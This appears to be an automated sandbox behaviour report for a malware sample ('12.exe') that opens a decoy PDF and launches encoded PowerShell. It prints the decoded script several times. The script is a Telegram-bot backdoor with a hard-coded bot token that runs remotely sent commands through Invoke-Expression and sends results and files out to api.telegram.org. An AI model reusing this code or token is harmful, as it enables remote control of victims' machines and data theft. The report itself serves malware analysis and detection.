Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath,
Source: C:\Users\user\Desktop\12.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath, Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath, Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQJump to behavior
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "start-process 'c:\users\user\appdata\local\temp\/file.pdf'; powershell.exe -e 'jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acq
Source: C:\Users\user\Desktop\12.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "start-process 'c:\users\user\appdata\local\temp\/file.pdf'; powershell.exe -e 'jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabuag8aawblag4aiaa9acaaiga3aduanqa0admamaa3adyanga5adoaqqbbaeuaxwbsag4auqbuafkauwbyahyadqbzageaswbsagsacaboahiadgayaeqadgbzahuaqwa3aegaaabjadaacwawaciadqakacqavqbsaewaiaa9acaaigboahqadabwahmaogavac8ayqbwagkalgb0aguabablagcacgbhag0algbvahiazwavagiabwb0ahsamab9aciaiaatagyaiaakafqabwbraguabganaaoajabsageacwb0aekaraagad0aiaaxadiamwanaaoajabzagwazqblahaavabpag0azqagad0aiaayaa0acgakagkazablag4adabpagyaaqblahiaiaa9acaalqbqag8aaqbuacaakaaoadqaoaauac4anqa3ackaiab8acaarwblahqalqbsageabgbkag8abqagac0aqwbvahuabgb0acaanqagahwaiaalacaaewbbagmaaabhahiaxqakaf8afqapaa0acganaaoazgb1ag4aywb0agkabwbuacaasqbuahyabwbragualqbcag8adabdag0azaagahsadqakacaaiaagacaacabhahiayqbtacaakaanaaoaiaagacaaiaagacaaiaagacqaywbvag0abqbhag4azaanaaoaiaagacaaiaapaa0acgagacaaiaagahqacgb5acaaewanaaoaiaagacaaiaagacaaiaagacqacgblahmadqbsahqaiaa9acaasqbuahyabwbragualqbfahgacabyaguacwbzagkabwbuacgajabjag8abqbtageabgbkackadqakacaaiaagacaafqanaaoaiaagacaaiabjageadabjaggaiab7aa0acgagacaaiaagacaaiaagacaajabyaguacwb1agwadaagad0aiaakaeuacgbyag8acgbbadaaxqauaeuaeabjaguacab0agkabwbuaa0acgagacaaiaagah0adqakacaaiaagacaajabyaguacwagad0aiaaiafsajabpagqazqbuahqaaqbmagkazqbyaf0ajqawaeqajqawaeeaiganaaoaiaagacaaiaakahiazqbzahuabab0acaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsajabyaguacwagacsapqagafsacwb0ahiaaqbuagcaxqakaf8aiaaracaaigaladaaraaladaaqqaiah0adqakaa0acgagacaaiaagagkazgaoacqacgblahmaiaataguacqagaciaigapahsadqakacaaiaagacaaiaagacaaiaakagwayqbzahqasqbeacaapqagacqadqbwagqayqb0aguaaqbkaa0acgagacaaiaagacaaiaagacaaywbvag4adabpag4adqblaa0acgagacaaiaagah0adqakacaaiaagacaaaqbmacgajabyaguacwauaewazqbuagcadaboacaalqbnahqaiaa0adaaoqa1ackaewanaaoaiaagacaaiaagacaaiaagagyabwbyacaakaakagkaiaa9acaamaa7acaajabpacaalqbsahqaiaakahiazqbzac4atablag4azwb0aggaiaavacaanaawadkanqa7acaajabpacsakwapacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiaguazwbpag4aiaa9acaajabpacaakgagadqamaa5aduadqakacaaiaagacaaiaagacaaiaagacaaiaagacqazqbuagqaiaa9acaajabiaguazwbpag4aiaaracaanaawadkanaanaaoaiaagacaaiaagacaaiaagacaaiaagacaaaqbmacgajablag4azaagac0azwb0acaajabyaguacwauaewazqbuagcadaboackaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaakaguabgbkacaapqagacqacgblahmalgbmaguabgbnahqaaaanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabkageadabhacaapqagaciaywboageadabfagkazaa9acqazgbyag8abqamahqazqb4ahqapqaiacaakwagacqacgblahmawwakagiazqbnagkabgauac4ajablag4azabdaa0acgagacaaiaagacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqazabhahqayqaiaa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajabvafiasqagad4aiaakag4adqbsagwadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0aiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacqazabhahqayqagad0aiaaiagmaaabhahqaxwbpagqapqakagyacgbvag0ajgb0aguaeab0ad0ajabyaguacwaiacaadqakacaaiaagacaaiaagacaaiaakafuaugbjacaapqagaciajabvafiataavahmazqbuagqatqblahmacwbhagcazqa/acqJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A411E30 cpuid 0_2_00007FF73A411E30
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,0_2_00007FF73A406384
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF73A40EB80
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,0_2_00007FF73A40E494
Source: C:\Users\user\Desktop\12.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF73A40E138
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00007FF73A3F6A04
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF73A40E99C
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,0_2_00007FF73A40EA4C
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,0_2_00007FF73A406718
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,0_2_00007FF73A40E844
Source: C:\Users\user\Desktop\12.exeCode function: EnumSystemLocalesW,0_2_00007FF73A40E564
Source: C:\Users\user\Desktop\12.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF73A40E5FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
